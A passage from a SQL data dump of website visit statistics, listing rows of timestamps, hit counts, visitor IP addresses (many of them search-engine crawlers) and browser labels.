1582977450,1,1,0,0,'109.74.154.72','chrome'),(485465,1582978010,1,1,0,0,'141.8.132.12','other'),(485466,1582978050,252,252,0,0,'31.40.202.182','other'),(485467,1582978174,1,1,0,0,'157.55.39.239','other'),(485468,1582978297,1,1,0,0,'37.9.113.177','other'),(485469,1582978319,1,1,0,0,'88.99.2.203','other'),(485470,1582978321,16,16,0,0,'136.243.70.68','other'),(485471,1582978951,16,16,0,0,'31.40.202.182','other'),(485472,1582979372,1,1,0,0,'207.46.13.42','other'),(485473,1582979946,1,1,0,0,'178.154.171.134','other'),(485474,1582980531,1,1,0,0,'87.228.16.169','chrome'),(485475,1582980545,1,1,0,0,'207.46.13.79','other'),(485476,1582980739,1,1,0,0,'91.196.178.182','chrome'),(485477,1582980926,1,1,0,0,'91.196.178.90','chrome'),(485478,1582980984,1,1,0,0,'178.154.171.134','other'),(485479,1582981040,1,1,0,0,'178.154.171.127','other'),(485480,1582981711,1,1,0,0,'91.196.178.161','chrome'),(485481,1582981997,1,1,0,0,'178.154.171.127','other'),(485482,1582982683,1,1,0,0,'8.29.198.27','other'),(485483,1582983755,2,2,0,0,'178.154.171.134','other'),(485484,1582984568,1,1,0,0,'79.143.39.102','chrome'),(485485,1582984772,1,1,0,0,'178.154.171.127','other'),(485486,1582985393,1,1,0,0,'178.154.171.134','other'),(485487,1582985420,1,0,1,0,'157.55.39.239',''),(485488,1582985880,1,1,0,0,'207.46.13.79','other'),(485489,1582986203,1,1,0,0,'66.249.64.26','chrome'),(485490,1582986745,13,13,0,0,'31.40.202.182','other'),(485491,1582987050,1,1,0,0,'178.154.171.127','other'),(485492,1582987231,1,1,0,0,'157.55.39.239','other'),(485493,1582987375,1,1,0,0,'8.29.198.27','other'),(485494,1582987673,1,0,1,0,'207.46.13.42',''),(485495,1582988132,1,1,0,0,'31.13.127.4','other'),(485496,1582988133,1,1,0,0,'31.13.127.19','other'),(485500,1582988153,2,2,0,0,'31.13.127.10','other'),(485502,1582988154,1,1,0,0,'31.13.127.5','other'),(485508,1582988155,4,4,0,0,'31.13.127.2','other'),(485520,1582988156,1,1,0,0,'31.13.127.17','other'),(485521,1582989765,1,1,0,0,'178.154.171.134','other'),(485522,1582990060,1,1,0,0,'91.196.178.44','other'),(485523,1582990825,1,1,0,0,'5.45.207.49','other'),(485524,1582991116,1,1,0,0,'66.249.70.62','chrome'),(485525,1582991777,1,1,0,0,'37.52.115.210','chrome'),(485526,1582992635,1,1,0,0,'178.154.171.134','other'),(485527,1582992789,1,1,0,0,'95.134.97.202','chrome'),(485528,1582993158,1,1,0,0,'109.201.133.100','other'),(485529,1582993655,1,1,0,0,'8.29.198.25','other'),(485530,1582994231,1,1,0,0,'178.154.171.127','other'),(485531,1582994811,1,1,0,0,'91.196.178.124','chrome'),(485532,1582995356,1,1,0,0,'141.8.142.132','other'),(485533,1582995599,1,1,0,0,'66.249.70.62','chrome'),(485534,1582996115,1,1,0,0,'141.8.183.53','other'),(485535,1582996298,1,1,0,0,'37.9.113.97','other'),(485536,1582996301,1,1,0,0,'95.108.213.61','other'),(485537,1582996541,1,1,0,0,'178.154.171.134','other'),(485538,1582996772,1,1,0,0,'46.211.246.80','chrome'),(485539,1582997131,2,2,0,0,'178.154.171.127','other'),(485540,1582997588,1,1,0,0,'46.211.136.144','chrome'),(485541,1582997647,1,1,0,0,'178.154.171.134','other'),(485542,1582998263,1,1,0,0,'141.8.132.28','other'),(485543,1582998291,1,1,0,0,'141.8.183.33','other'),(485544,1582998298,1,1,0,0,'207.46.13.42','other'),(485545,1582998369,1,1,0,0,'91.196.178.68','chrome'),(485546,1582998415,1,1,0,0,'8.29.198.27','other'),(485547,1582999050,2,2,0,0,'178.154.171.127','other'),(485548,1582999470,1,1,0,0,'178.154.171.134','other'),(485549,1583000536,2,1,1,0,'207.46.13.167',''),(485550,1583000976,2,2,0,0,'91.196.178.188','chrome'),(485551,1583003861,1,1,0,0,'207.46.13.167','other'),(485552,1583004358,1,1,0,0,'178.154.171.127','other'),(485553,1583004514,3,3,0,0,'178.154.171.134','other'),(485554,1583004647,1,1,0,0,'8.29.198.26','other'),(485555,1583006418,1,1,0,0,'178.154.171.134','other'),(485556,1583007283,1,1,0,0,'66.249.70.33','chrome'),(485557,1583007699,1,1,0,0,'95.133.153.36','chrome'),(485558,1583007769,1,1,0,0,'178.159.37.88','chrome'),(485559,1583008085,1,1,0,0,'91.196.178.50','chrome'),(485560,1583008357,1,1,0,0,'207.46.13.79','other'),(485561,1583008434,2,2,0,0,'178.154.171.134','other'),(485562,1583009409,1,1,0,0,'8.29.198.25','other'),(485563,1583010066,1,1,0,0,'207.46.13.50','other'),(485564,1583011217,1,1,0,0,'37.9.113.10','other'),(485565,1583011376,1,1,0,0,'178.154.171.127','other'),(485566,1583013010,1,1,0,0,'207.46.13.79','other'),(485567,1583013556,2,2,0,0,'178.154.171.134','other'),(485568,1583013872,73,73,0,0,'31.40.202.182','other'),(485569,1583014382,2,2,0,0,'178.154.171.127','other'),(485570,1583015596,1,1,0,0,'8.29.198.25','other'),(485571,1583016494,1,1,0,0,'178.154.171.134','other'),(485572,1583017418,1,1,0,0,'66.249.70.62','chrome'),(485573,1583018001,2,2,0,0,'207.46.13.42','other'),(485574,1583018660,1,1,0,0,'141.8.183.53','other'),(485575,1583018812,1,1,0,0,'3.87.138.22','chrome'),(485576,1583019806,1,1,0,0,'141.8.142.177','other'),(485577,1583020159,1,1,0,0,'141.8.188.18','other'),(485578,1583020425,1,1,0,0,'8.29.198.26','other'),(485579,1583020436,2,2,0,0,'141.8.142.164','other'),(485580,1583020735,1,1,0,0,'141.8.142.2','other'),(485581,1583022456,1,1,0,0,'37.9.113.39','other'),(485582,1583022851,1,1,0,0,'95.108.213.39','other'),(485583,1583023784,2,2,0,0,'207.46.13.191','other'),(485584,1583024114,1,1,0,0,'62.205.134.182','other'),(485585,1583024803,1,1,0,0,'178.154.171.134','other'),(485586,1583025257,3,3,0,0,'104.154.236.18','chrome'),(485587,1583025269,4,4,0,0,'34.66.32.138','chrome'),(485589,1583025427,1,0,1,0,'66.249.64.28',''),(485590,1583025444,2,1,1,0,'66.249.64.26',''),(485591,1583025784,1,1,0,0,'207.46.13.191','other'),(485592,1583025829,1,1,0,0,'178.154.171.127','other'),(485593,1583025979,2,2,0,0,'178.154.171.134','other'),(485594,1583026543,1,1,0,0,'8.29.198.27','other'),(485595,1583026898,1,1,0,0,'141.8.183.73','other'),(485596,1583028205,1,0,1,0,'66.249.64.28',''),(485597,1583028926,1,1,0,0,'178.154.171.134','other'),(485598,1583030076,1,1,0,0,'178.154.171.127','other'),(485599,1583030807,1,1,0,0,'207.46.13.79','other'),(485600,1583031447,1,1,0,0,'8.29.198.25','other'),(485601,1583031767,2,0,2,0,'66.249.64.27',''),(485602,1583033036,1,1,0,0,'178.154.171.134','other'),(485603,1583033820,2,1,1,0,'66.249.64.27',''),(485604,1583034289,2,2,0,0,'207.46.13.42','other'),(485605,1583034416,1,1,0,0,'66.249.64.27','chrome'),(485606,1583034445,2,2,0,0,'66.249.64.28','chrome'),(485607,1583034447,1,1,0,0,'178.154.171.134','other'),(485608,1583035457,1,0,1,0,'157.55.39.218',''),(485609,1583035830,1,1,0,0,'66.249.64.28','chrome'),(485610,1583035916,2,2,0,0,'178.154.171.134','other'),(485611,1583036197,1,1,0,0,'207.46.13.79','other'),(485612,1583036992,1,1,0,0,'207.46.13.157','other'),(485613,1583037077,1,1,0,0,'178.154.171.134','other'),(485614,1583037141,1,0,1,0,'66.249.64.27',''),(485615,1583037487,1,1,0,0,'8.29.198.25','other'),(485616,1583037658,1,1,0,0,'87.250.224.90','other'),(485617,1583039212,1,1,0,0,'178.154.171.134','other'),(485618,1583040199,1,1,0,0,'31.40.202.182','other'),(485619,1583040818,1,1,0,0,'178.154.171.127','other'),(485620,1583041008,2,2,0,0,'207.46.13.167','other'),(485621,1583041378,1,1,0,0,'62.205.134.182','other'),(485622,1583041698,1,1,0,0,'207.46.13.79','other'),(485623,1583041714,1,0,1,0,'207.46.13.20',''),(485624,1583042488,1,1,0,0,'8.29.198.25','other'),(485625,1583043837,1,1,0,0,'66.249.64.28','chrome'),(485626,1583043860,1,1,0,0,'207.46.13.79','other'),(485627,1583044781,1,1,0,0,'178.154.171.134','other'),(485628,1583044934,2,2,0,0,'207.46.13.191','other'),(485629,1583045009,1,1,0,0,'66.249.70.62','chrome'),(485630,1583045014,1,0,1,0,'207.46.13.20',''),(485631,1583045787,1,1,0,0,'141.8.142.164','other'),(485632,1583046187,1,1,0,0,'116.203.59.65','other'),(485633,1583046203,1,1,0,0,'5.45.207.65','other'),(485634,1583047275,1,0,1,0,'66.249.70.62',''),(485635,1583047630,1,1,0,0,'66.249.70.36','chrome'),(485636,1583047747,1,1,0,0,'66.249.64.26','chrome'),(485637,1583047750,1,1,0,0,'91.196.178.89','chrome'),(485638,1583048297,1,1,0,0,'141.8.183.33','other'),(485639,1583048462,1,1,0,0,'8.29.198.25','other'),(485640,1583049324,1,1,0,0,'66.249.64.26','chrome'),(485641,1583049408,2,2,0,0,'54.189.99.174','chrome'),(485642,1583049412,3,3,0,0,'54.189.99.174','firefox'),(485643,1583049515,1,1,0,0,'87.250.224.90','other'),(485644,1583050682,2,2,0,0,'52.24.206.100','firefox'),(485645,1583050686,3,3,0,0,'52.24.206.100','chrome'),(485646,1583051110,1,0,1,0,'207.46.13.20',''),(485647,1583052399,1,1,0,0,'66.249.64.27','chrome'),(485648,1583052689,1,1,0,0,'66.249.70.33','chrome'),(485649,1583053309,1,1,0,0,'207.46.13.79','other'),(485650,1583053313,1,1,0,0,'207.46.13.167','other'),(485651,1583053431,1,1,0,0,'66.249.64.28','chrome'),(485652,1583053481,1,1,0,0,'8.29.198.27','other'),(485653,1583053691,1,1,0,0,'157.55.39.142','other'),(485654,1583055559,1,1,0,0,'66.249.64.27','chrome'),(485655,1583057127,1,1,0,0,'193.106.30.99','firefox'),(485656,1583058610,2,2,0,0,'207.46.13.76','other'),(485657,1583059045,2,2,0,0,'66.249.64.28','chrome'),(485658,1583059177,1,1,0,0,'66.249.64.27','chrome'),(485659,1583059397,1,1,0,0,'8.29.198.27','other'),(485660,1583060738,1,1,0,0,'207.46.13.76','other'),(485661,1583061217,1,1,0,0,'173.252.111.12','other'),(485662,1583061218,1,1,0,0,'173.252.111.20','other'),(485664,1583061542,1,1,0,0,'91.196.178.60','chrome'),(485665,1583061848,1,1,0,0,'178.154.171.127','other'),(485666,1583061861,1,1,0,0,'37.9.113.200','other'),(485667,1583061872,2,2,0,0,'141.8.188.18','other'),(485668,1583061886,1,1,0,0,'178.154.171.134','other'),(485669,1583061915,1,1,0,0,'141.8.142.115','other'),(485670,1583061918,1,1,0,0,'37.9.113.33','other'),(485671,1583061922,1,1,0,0,'178.154.171.66','other'),(485672,1583061925,1,1,0,0,'141.8.183.67','other'),(485673,1583061928,1,1,0,0,'141.8.132.28','other'),(485674,1583061957,1,1,0,0,'95.108.213.39','other'),(485675,1583061960,1,1,0,0,'37.9.113.97','other'),(485676,1583061963,1,1,0,0,'141.8.188.20','other'),(485677,1583061965,1,1,0,0,'141.8.142.132','other'),(485678,1583061969,1,1,0,0,'141.8.142.2','other'),(485679,1583061971,1,1,0,0,'141.8.183.73','other'),(485680,1583061974,1,1,0,0,'87.250.224.90','other'),(485681,1583061976,1,1,0,0,'141.8.188.12','other'),(485682,1583061978,1,1,0,0,'141.8.183.33','other'),(485683,1583061980,1,1,0,0,'95.108.213.61','other'),(485684,1583062153,1,1,0,0,'173.252.87.28','other'),(485685,1583062154,1,1,0,0,'173.252.87.9','other'),(485686,1583062859,2,2,0,0,'66.249.64.27','chrome'),(485687,1583062988,1,1,0,0,'207.46.13.76','other'),(485688,1583063370,1,1,0,0,'109.74.154.72','chrome'),(485689,1583063619,1,1,0,0,'66.249.64.26','chrome'),(485690,1583063929,1,1,0,0,'207.46.13.79','other'),(485691,1583064273,2,2,0,0,'66.249.64.27','chrome'),(485692,1583064450,1,1,0,0,'8.29.198.26','other'),(485693,1583065645,1,1,0,0,'207.46.13.210','other'),(485694,1583066573,1,1,0,0,'66.249.70.36','chrome'),(485695,1583066935,1,1,0,0,'66.249.64.28','chrome'),(485696,1583067145,1,1,0,0,'207.46.13.76','other'),(485697,1583067536,1,1,0,0,'66.249.64.27','chrome'),(485698,1583067897,1,1,0,0,'5.45.207.49','other'),(485699,1583068219,1,1,0,0,'207.46.13.210','other'),(485700,1583068518,1,1,0,0,'77.111.244.73','chrome'),(485701,1583068630,1,1,0,0,'31.13.127.24','other'),(485702,1583068653,3,3,0,0,'66.249.64.28','chrome'),(485703,1583068818,2,2,0,0,'66.249.70.33','chrome'),(485704,1583069083,2,2,0,0,'66.249.64.26','chrome'),(485705,1583069891,1,1,0,0,'66.249.64.27','chrome'),(485706,1583069921,1,1,0,0,'51.68.152.26','chrome'),(485707,1583069927,1,1,0,0,'141.8.132.28','other'),(485708,1583070268,1,1,0,0,'37.9.113.97','other'),(485709,1583070351,1,1,0,0,'8.29.198.27','other'),(485710,1583070864,1,1,0,0,'46.211.242.36','chrome'),(485711,1583070986,2,1,1,0,'66.249.64.26',''),(485712,1583071127,2,2,0,0,'66.249.64.27','chrome'),(485713,1583071838,1,1,0,0,'13.115.220.150','chrome'),(485714,1583072617,2,2,0,0,'207.46.13.210','other'),(485715,1583072905,2,2,0,0,'66.249.64.28','chrome'),(485716,1583073197,1,1,0,0,'207.46.13.76','other'),(485717,1583073470,1,1,0,0,'66.249.70.36','chrome'),(485718,1583075100,1,1,0,0,'207.46.13.79','other'),(485719,1583075451,1,1,0,0,'8.29.198.26','other'),(485720,1583075543,2,2,0,0,'207.46.13.76','other'),(485721,1583076610,1,1,0,0,'91.196.178.157','chrome'),(485722,1583076743,1,1,0,0,'66.249.64.27','chrome'),(485723,1583076929,1,1,0,0,'213.109.224.46','chrome'),(485724,1583077266,1,1,0,0,'207.46.13.79','other'),(485725,1583077820,1,1,0,0,'207.46.13.210','other'),(485726,1583077846,1,1,0,0,'207.46.13.95','other'),(485727,1583077883,1,1,0,0,'66.249.64.26','chrome'),(485728,1583078510,1,1,0,0,'66.249.70.62','chrome'),(485729,1583078985,1,1,0,0,'66.249.70.33','chrome'),(485730,1583079144,1,1,0,0,'207.46.13.95','other'),(485731,1583079312,2,2,0,0,'66.249.64.26','chrome'),(485732,1583079442,2,2,0,0,'66.249.64.28','chrome'),(485733,1583079530,1,1,0,0,'66.249.64.27','chrome'),(485734,1583080353,1,1,0,0,'207.46.13.76','other'),(485735,1583080412,1,1,0,0,'66.249.64.28','chrome'),(485736,1583080482,2,2,0,0,'66.249.64.26','chrome'),(485737,1583081289,1,1,0,0,'8.29.198.27','other'),(485738,1583082404,7,7,0,0,'54.157.112.68','other'),(485739,1583083052,1,1,0,0,'77.111.244.210','chrome'),(485740,1583083067,1,1,0,0,'54.37.234.127','chrome'),(485741,1583083429,1,1,0,0,'66.249.64.26','chrome'),(485742,1583083877,1,0,1,0,'207.46.13.76',''),(485743,1583084559,1,1,0,0,'66.249.70.33','chrome'),(485744,1583084933,1,1,0,0,'5.45.207.49','other'),(485745,1583085336,1,1,0,0,'178.94.172.5','chrome'),(485746,1583085433,1,1,0,0,'66.249.70.62','chrome'),(485747,1583085688,1,1,0,0,'66.249.64.27','chrome'),(485748,1583085697,1,1,0,0,'207.46.13.210','other'),(485749,1583086403,1,1,0,0,'8.29.198.25','other'),(485750,1583086742,1,1,0,0,'66.249.64.28','chrome'),(485751,1583086747,1,1,0,0,'141.8.188.25','other'),(485752,1583087363,1,1,0,0,'95.108.213.3','other'),(485753,1583087485,1,1,0,0,'207.46.13.210','other'),(485754,1583087936,1,1,0,0,'141.8.142.177','other'),(485755,1583088156,1,1,0,0,'66.249.64.28','chrome'),(485756,1583088707,1,1,0,0,'207.46.13.210','other'),(485757,1583089105,3,3,0,0,'207.46.13.95','other'),(485758,1583090343,1,1,0,0,'207.46.13.79','other'),(485759,1583090449,1,1,0,0,'141.8.132.28','other'),(485760,1583090587,3,3,0,0,'66.249.64.26','chrome'),(485761,1583090831,1,1,0,0,'207.46.13.95','other'),(485762,1583091115,1,1,0,0,'37.9.113.39','other'),(485763,1583091350,1,1,0,0,'141.8.188.12','other'),(485764,1583092208,1,1,0,0,'8.29.198.26','other'),(485765,1583092354,1,1,0,0,'141.8.142.164','other'),(485766,1583092510,103,103,0,0,'192.99.6.138','other'),(485767,1583092677,33,33,0,0,'192.99.4.163','other'),(485768,1583092731,1,0,1,0,'207.46.13.95',''),(485769,1583093175,1,1,0,0,'66.249.64.26','chrome'),(485770,1583093416,120,120,0,0,'192.99.6.138','other'),(485771,1583093529,1,1,0,0,'66.249.64.28','chrome'),(485772,1583093613,43,43,0,0,'192.99.4.163','other'),(485773,1583094322,67,67,0,0,'192.99.6.138','other'),(485774,1583094534,39,39,0,0,'192.99.4.163','other'),(485775,1583094984,3,3,0,0,'66.249.64.27','chrome'),(485776,1583095030,2,2,0,0,'207.46.13.79','other'),(485777,1583095034,1,1,0,0,'207.46.13.76','other'),(485778,1583095448,37,37,0,0,'192.99.4.163','other'),(485779,1583095901,1,1,0,0,'141.8.188.18','other'),(485780,1583096124,1,1,0,0,'66.249.64.28','chrome'),(485781,1583096344,3,3,0,0,'66.249.64.27','chrome'),(485782,1583096372,47,47,0,0,'192.99.4.163','other'),(485783,1583096481,4,4,0,0,'66.249.64.26','chrome'),(485784,1583097277,53,53,0,0,'192.99.4.163','other'),(485785,1583097378,1,1,0,0,'8.29.198.27','other'),(485786,1583097771,1,0,1,0,'207.46.13.95',''),(485787,1583098063,2,2,0,0,'66.249.64.26','chrome'),(485788,1583098186,38,38,0,0,'192.99.4.163','other'),(485789,1583098238,1,1,0,0,'141.8.142.177','other'),(485790,1583099136,2,2,0,0,'141.8.188.25','other'),(485791,1583099309,1,1,0,0,'207.46.13.210','other'),(485792,1583099553,1,1,0,0,'141.8.188.66','other'),(485793,1583099739,1,1,0,0,'66.249.64.28','chrome'),(485794,1583099764,1,0,1,0,'207.46.13.95',''),(485795,1583099985,1,1,0,0,'141.8.188.38','other'),(485796,1583099993,1,1,0,0,'207.46.13.95','other'),(485797,1583100727,1,1,0,0,'199.244.88.131','chrome'),(485798,1583101418,1,1,0,0,'207.46.13.210','other'),(485799,1583101499,2,2,0,0,'66.249.64.27','chrome'),(485800,1583101806,1,1,0,0,'207.46.13.95','other'),(485801,1583101992,2,2,0,0,'66.249.64.26','chrome'),(485802,1583102959,1,1,0,0,'66.249.64.28','chrome'),(485803,1583103139,1,1,0,0,'8.29.198.27','other'),(485804,1583103269,1,1,0,0,'207.46.13.76','other'),(485805,1583103399,2,2,0,0,'66.249.64.26','chrome'),(485806,1583103567,1,1,0,0,'207.46.13.210','other'),(485807,1583103657,1,1,0,0,'207.46.13.95','other'),(485808,1583104102,1,1,0,0,'141.8.142.164','other'),(485809,1583105063,2,2,0,0,'66.249.64.26','chrome'),(485810,1583105359,1,1,0,0,'207.46.13.79','other'),(485811,1583105472,3,3,0,0,'66.249.64.27','chrome'),(485812,1583105762,1,1,0,0,'207.46.13.76','other'),(485813,1583105973,1,1,0,0,'141.8.142.164','other'),(485814,1583106196,1,1,0,0,'141.8.142.2','other'),(485815,1583107198,1,1,0,0,'207.46.13.79','other'),(485816,1583108073,1,1,0,0,'66.249.64.28','chrome'),(485817,1583108256,1,1,0,0,'66.249.70.62','chrome'),(485818,1583108383,1,1,0,0,'8.29.198.25','other'),(485819,1583108485,1,1,0,0,'66.249.64.27','chrome'),(485820,1583108487,1,1,0,0,'66.249.70.33','chrome'),(485821,1583108859,1,1,0,0,'207.46.13.95','other'),(485822,1583109415,1,0,1,0,'207.46.13.76',''),(485823,1583109885,1,1,0,0,'66.249.64.30','chrome'),(485824,1583109908,1,1,0,0,'66.249.64.28','chrome'),(485825,1583110019,1,1,0,0,'66.249.70.33','chrome'),(485826,1583110328,1,1,0,0,'66.249.64.26','chrome'),(485827,1583110517,1,1,0,0,'62.205.134.182','other'),(485828,1583111029,1,1,0,0,'207.46.13.79','other'),(485829,1583111143,2,2,0,0,'141.8.188.20','other'),(485830,1583111622,1,1,0,0,'66.249.64.27','chrome'),(485831,1583112080,2,2,0,0,'66.249.64.26','chrome'),(485832,1583112347,1,1,0,0,'37.9.113.142','other'),(485833,1583112414,2,2,0,0,'141.8.142.164','other'),(485834,1583112691,1,1,0,0,'95.108.213.39','other'),(485835,1583112740,1,0,1,0,'207.46.13.76',''),(485836,1583112800,1,0,1,0,'207.46.13.210',''),(485837,1583113446,1,1,0,0,'207.46.13.210','other'),(485838,1583113697,1,1,0,0,'66.249.64.28','chrome'),(485839,1583113699,82,82,0,0,'88.99.149.173','other'),(485840,1583114082,1,1,0,0,'8.29.198.27','other'),(485841,1583114604,79,79,0,0,'88.99.149.173','other'),(485842,1583114708,1,1,0,0,'207.46.13.210','other'),(485843,1583114898,3,3,0,0,'66.249.64.27','chrome'),(485844,1583114943,1,1,0,0,'37.9.113.39','other'),(485845,1583115132,1,1,0,0,'66.249.64.28','chrome'),(485846,1583115189,1,1,0,0,'141.8.188.38','other'),(485847,1583115512,85,85,0,0,'88.99.149.173','other'),(485848,1583115553,1,1,0,0,'5.45.207.49','other'),(485849,1583115777,1,1,0,0,'66.249.70.62','chrome'),(485850,1583116427,84,84,0,0,'88.99.149.173','other'),(485851,1583116594,3,3,0,0,'66.249.64.26','chrome'),(485852,1583116768,2,2,0,0,'91.209.11.236','other'),(485853,1583116932,1,1,0,0,'95.108.181.103','other'),(485854,1583117091,1,1,0,0,'66.249.64.27','chrome'),(485855,1583117100,1,1,0,0,'66.249.64.28','chrome'),(485856,1583117143,1,1,0,0,'207.46.13.79','other'),(485857,1583117332,84,84,0,0,'88.99.149.173','other'),(485858,1583117751,4,4,0,0,'66.249.64.26','chrome'),(485859,1583117759,1,1,0,0,'91.209.11.236','other'),(485860,1583118245,81,81,0,0,'88.99.149.173','other'),(485861,1583118717,1,1,0,0,'207.46.13.95','other'),(485862,1583119005,1,1,0,0,'207.46.13.76','other'),(485863,1583119116,4,4,0,0,'66.249.64.28','chrome'),(485864,1583119160,84,84,0,0,'88.99.149.173','other'),(485865,1583119190,1,1,0,0,'66.249.70.33','chrome'),(485866,1583119366,1,1,0,0,'8.29.198.26','other'),(485867,1583119543,1,1,0,0,'37.9.113.39','other'),(485868,1583120065,83,83,0,0,'88.99.149.173','other'),(485869,1583120170,1,1,0,0,'66.249.70.33','chrome'),(485870,1583120783,1,1,0,0,'66.249.70.36','chrome'),(485871,1583120979,83,83,0,0,'88.99.149.173','other'),(485872,1583121340,1,0,1,0,'207.46.13.76',''),(485873,1583121498,1,1,0,0,'207.46.13.95','other'),(485874,1583121886,81,81,0,0,'88.99.149.173','other'),(485875,1583121970,1,1,0,0,'66.249.64.28','chrome'),(485876,1583122284,1,1,0,0,'66.249.70.33','chrome'),(485877,1583122731,1,1,0,0,'66.249.64.27','chrome'),(485878,1583122793,81,81,0,0,'88.99.149.173','other'),(485879,1583123027,1,1,0,0,'66.249.64.26','chrome'),(485880,1583123065,1,1,0,0,'68.183.104.51','msie'),(485881,1583123618,1,1,0,0,'66.249.70.36','chrome'),(485882,1583123700,81,81,0,0,'88.99.149.173','other'),(485883,1583123813,1,1,0,0,'66.249.64.28','chrome'),(485884,1583124134,1,1,0,0,'66.249.70.62','chrome'),(485885,1583124265,1,1,0,0,'207.46.13.76','other'),(485886,1583124531,1,1,0,0,'141.8.142.177','other'),(485887,1583124603,58,58,0,0,'88.99.149.173','other'),(485888,1583124692,1,1,0,0,'66.249.64.27','chrome'),(485889,1583125025,1,1,0,0,'8.29.198.25','other'),(485890,1583125408,2,2,0,0,'66.249.64.26','chrome'),(485891,1583125684,4,4,0,0,'88.99.149.173','other'),(485892,1583125905,1,1,0,0,'141.8.183.33','other'),(485893,1583126408,1,1,0,0,'66.249.64.27','chrome'),(485894,1583126650,1,1,0,0,'207.46.13.95','other'),(485895,1583126897,6,6,0,0,'88.99.149.173','other'),(485896,1583127187,1,1,0,0,'141.8.142.50','other'),(485897,1583127209,1,0,1,0,'13.66.139.0',''),(485898,1583127590,1,0,1,0,'207.46.13.210',''),(485899,1583127625,1,1,0,0,'141.8.183.111','other'),(485900,1583127762,1,1,0,0,'87.250.224.90','other'),(485901,1583127945,1,1,0,0,'62.205.134.182','other'),(485902,1583128108,1,1,0,0,'88.99.149.173','other'),(485903,1583129012,1,1,0,0,'141.8.142.115','other'),(485904,1583129308,6,6,0,0,'88.99.149.173','other'),(485905,1583129693,1,1,0,0,'46.211.157.38','chrome'),(485906,1583129715,1,0,1,0,'207.46.13.210',''),(485907,1583130317,1,1,0,0,'8.29.198.25','other'),(485908,1583130462,1,1,0,0,'66.249.64.28','chrome'),(485909,1583131249,1,0,1,0,'207.46.13.95',''),(485910,1583131279,1,1,0,0,'66.249.64.26','chrome'),(485911,1583131518,1,0,1,0,'207.46.13.76',''),(485912,1583132644,1,1,0,0,'66.249.64.27','chrome'),(485913,1583132818,1,1,0,0,'66.249.64.28','chrome'),(485914,1583133886,1,1,0,0,'77.111.244.152','chrome'),(485915,1583134192,1,1,0,0,'66.249.64.26','chrome'),(485916,1583134700,2,2,0,0,'178.154.171.134','other'),(485917,1583134977,3,3,0,0,'66.249.64.27','chrome'),(485918,1583135126,1,1,0,0,'193.17.44.18','chrome'),(485919,1583135148,1,1,0,0,'207.46.13.210','other'),(485920,1583135200,1,1,0,0,'46.164.144.180','firefox'),(485921,1583135879,2,2,0,0,'178.154.171.134','other'),(485922,1583135943,1,1,0,0,'8.29.198.25','other'),(485923,1583136165,1,1,0,0,'207.46.13.76','other'),(485924,1583136476,1,1,0,0,'91.196.178.82','chrome'),(485925,1583136759,1,1,0,0,'66.249.64.28','chrome'),(485926,1583137225,1,1,0,0,'91.196.178.66','chrome'),(485927,1583137229,2,2,0,0,'178.154.171.134','other'),(485928,1583138323,1,1,0,0,'178.154.171.127','other'),(485929,1583138762,1,1,0,0,'91.196.178.86','firefox'),(485930,1583138811,1,1,0,0,'207.46.13.76','other'),(485931,1583138937,1,1,0,0,'91.196.178.66','chrome'),(485932,1583139319,1,1,0,0,'62.149.16.175','chrome'),(485933,1583139647,1,1,0,0,'178.154.171.127','other'),(485934,1583140175,2,2,0,0,'207.46.13.76','other'),(485935,1583140265,1,1,0,0,'207.46.13.79','other'),(485936,1583140274,1,1,0,0,'207.46.13.95','other'),(485937,1583140403,1,1,0,0,'91.196.177.46','chrome'),(485938,1583140643,1,1,0,0,'91.196.178.82','chrome'),(485939,1583141393,1,1,0,0,'8.29.198.27','other'),(485940,1583141885,1,1,0,0,'66.249.64.28','chrome'),(485941,1583141972,1,1,0,0,'66.249.70.36','chrome'),(485942,1583142477,1,1,0,0,'178.154.171.134','other'),(485943,1583142487,1,1,0,0,'91.196.178.82','chrome'),(485944,1583142575,1,1,0,0,'34.239.148.79','chrome'),(485945,1583145135,1,1,0,0,'91.196.178.169','chrome'),(485946,1583145445,1,1,0,0,'91.196.178.82','chrome'),(485947,1583145524,1,1,0,0,'141.8.188.18','other'),(485948,1583146871,1,1,0,0,'87.250.224.104','other'),(485949,1583146891,1,1,0,0,'8.29.198.27','other'),(485950,1583146892,1,1,0,0,'207.46.13.210','other'),(485951,1583147552,1,1,0,0,'207.46.13.76','other'),(485952,1583147651,1,1,0,0,'207.46.13.79','other'),(485953,1583149003,1,1,0,0,'141.8.142.132','other'),(485954,1583149317,1,1,0,0,'109.74.154.72','chrome'),(485955,1583149742,1,0,1,0,'207.46.13.210',''),(485956,1583150074,1,1,0,0,'207.46.13.95','other'),(485957,1583150346,2,2,0,0,'207.46.13.76','other'),(485958,1583150698,1,1,0,0,'195.211.230.2','chrome'),(485959,1583151529,1,1,0,0,'207.46.13.76','other'),(485960,1583151631,1,0,1,0,'207.46.13.95',''),(485961,1583152399,1,1,0,0,'8.29.198.26','other'),(485962,1583152846,2,2,0,0,'207.46.13.95','other'),(485963,1583152874,1,1,0,0,'207.46.13.79','other'),(485964,1583152881,1,1,0,0,'17.58.101.25','other'),(485965,1583154054,1,1,0,0,'207.46.13.95','other'),(485966,1583154797,1,1,0,0,'91.196.177.46','chrome'),(485967,1583155962,1,0,1,0,'207.46.13.79',''),(485968,1583156217,2,2,0,0,'207.46.13.76','other'),(485969,1583157161,1,1,0,0,'128.72.21.96','chrome'),(485970,1583157297,1,1,0,0,'207.46.13.76','other'),(485971,1583157436,1,1,0,0,'91.196.177.46','chrome'),(485972,1583157553,1,1,0,0,'207.46.13.95','other'),(485973,1583157780,1,1,0,0,'91.196.179.138','firefox'),(485974,1583157888,1,1,0,0,'207.46.13.210','other'),(485975,1583157984,1,1,0,0,'8.29.198.27','other'),(485976,1583158226,1,1,0,0,'207.46.13.76','other'),(485977,1583158996,1,1,0,0,'207.46.13.79','other'),(485978,1583159367,1,1,0,0,'207.46.13.95','other'),(485979,1583159942,1,1,0,0,'91.196.178.187','chrome'),(485980,1583160244,1,1,0,0,'91.196.178.73','chrome'),(485981,1583160254,1,1,0,0,'207.46.13.76','other'),(485982,1583160796,1,1,0,0,'207.46.13.79','other'),(485983,1583160857,1,0,1,0,'207.46.13.95',''),(485984,1583161243,1,1,0,0,'91.196.178.87','firefox'),(485985,1583162176,1,1,0,0,'66.249.64.26','chrome'),(485986,1583162460,1,1,0,0,'207.46.13.79','other'),(485987,1583162540,2,2,0,0,'207.46.13.76','other'),(485988,1583162826,1,0,1,0,'207.46.13.95',''),(485989,1583163523,1,1,0,0,'207.46.13.95','other'),(485990,1583163715,1,1,0,0,'207.46.13.210','other'),(485991,1583164004,1,1,0,0,'8.29.198.27','other'),(485992,1583165543,1,1,0,0,'207.46.13.210','other'),(48599